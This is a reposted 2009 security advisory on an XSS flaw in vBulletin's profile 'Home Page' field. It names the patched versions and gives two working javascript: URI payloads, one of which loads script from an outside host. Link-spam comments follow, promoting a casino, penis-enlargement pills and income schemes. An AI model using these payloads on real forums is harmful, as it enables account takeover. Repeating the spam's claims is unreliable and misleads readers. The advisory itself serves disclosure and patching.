Home » 2009 » October » 13 » vBulletin - Cross Site Script Redirection
9:00 AM
vBulletin - Cross Site Script Redirection
vBulletin - Cross Site Script Redirection


Versions Affected: 3.8.4 / 3.7.6 / 3.6.12
Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This could allow an attacker to carry out an action as a user or obtain
access to a user's account. To resolve this issue, it has been necessary to
release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases - simply
download the patch from the Members Area, extract the files and upload to
your webserver, overwriting the existing files. There is no upgrade script
required.

As with all security-based releases, we recommend that all customers
upgrade as soon as possible in order to prevent any potential damage
resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft?)

Researched & Disclosed by: MaXe (InterN0T.net)

Official Information:
http://www.vbulletin.com/forum/showthread.php?t=319572


-:: The Advisory ::-
The "Home Page" field in the user profile was only checking the user input
for either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 + :// will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars(),
however before the patch it did not check if a user would create a link that
would send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
- 90 character limit
- Characters will be converted to html entities.
- We can only use the data or javascript URI scheme.

This means that we should avoid " since that becomes " .. The other
characters like < will become &lt; which is %3C which is almost the same.
Please see how htmlentities() and htmlspecialchars() works in PHP.

The following scheme input as home page will alert 0:
javascript://%0adocument.
write('<script>alert(0)</script>')

The following scheme is a Proof of Concept that external Javascript can be loaded:
javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>')

The following URL contains a working Proof of Concept on the Contact Page:
http://forum.intern0t.net/members/maxe.html (will be removed soon)

-:: Solution ::-
Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1

-:: Conclusion ::-
vBulletin is generally a safe and secure platform to use for large forums.
This security hole / exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe/62-having-fun-cross-site-scripting.html for in-depth information.

Disclosure Information:
- Unknown date of when the vendor found the security hole.
- Vendor released patch on the 7th October 2009.
- Security hole researched and disclosed on 8th October 2009.

Disclosure Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html


All of the best,
Views: 28532 | Added by: apeh1706 | Rating: 0.0/0
Total comments: 391 2 3 4 »
0
39 -6100   [Entry]
casino-x.ucoz.ru

0
38 -6099   [Entry]
Любой текст 2 слова

0
37 VigRXPlus   [Entry]
Как думаете правда или не правда тут написана что можно увеличить пенис таблетками для увеличения члена - VigRx Plus и Xtrasize, я вот думаю купить, может кто-то пробовал или знает методы как можно увеличить пенис в домашних условиях и без операции? Вот сайт официального дилера в Украине и России: http://tele.in.ua/ а вот их канадский поставщик: https://www.vigrxplus.com/ct/144762 , проверял через переводчик, ну там вроде все нормально, но по 1 или 3 напрямую заказывать оттуда стремно и дороже даже чем тот же Xtrasize да и смысла нет, а они говорят что покупают у них сразу по 12, поэтому поштучно выгоднее брать у них уже растаможенный Виг Эрикс и не морочить голову с доставкойю А мне бы не хотелось чтобы мои деньги с карточки пропали на каком-то зарубежном сайте или сам товар по дороге! Что думаете по этому поводу? Жду комментариев!

0
36 Justinma   [Entry]
http://pityiprogram2015.pl

0
35 Any Good iBooks? Yes!   [Entry]
For anyone with an iPad, I recommend this iBook all about graffiti art: Henry Chalfant’s Graffiti Archive. It catalogs NYC subway graffiti in the 1980s … the beginning of Hip Hop! Whether you like art history, urban lore, sociology or even if you just like the pictures, this ibook is really cool. See here: [url=]https://itunes.apple.com/us/book/henry-chalfants-big-subway/id531594319?mt=11[/url]

0
34 VetalTynyton   [Entry]
Доброго времени суток! smile
Может хватит работать на дядю? Пока еще есть такая возможность, станьте финансово независимыми!
Я не навязываю, но если вам интересно, то ознакомьтесь подробнее пока еще дается такая возможность - http://youmyprofi.ru/2/index.html

0
33 powellmjl   [Entry]
Great post. I used to be checking continuously this blog and I'm impressed! Extremely helpful info specially the closing part :) I handle such information much. I used to be looking for this particular information for a very lengthy time. Thanks and best of luck. http://www.facebook.com/wholesalecheapsunglasseshats

0
32 Relmtieme   [Entry]
http://onehtcq.jigsy.com/ I have been lurking around here for very sometime but i havent made a comment, just thought i would say hello!

0
31 Intawayfany   [Entry]
Usually dislike any form of commenting, but whenever you read an excellent post sometimes you just need to get out of those lazy approaches. This is such a post!

0
30 Artelaarope   [Entry]
ОДНОКЛАССНИКИ ЗНАКОМСТВА

1-10 11-20 21-30 31-39
Name *:
Email *:
Code *: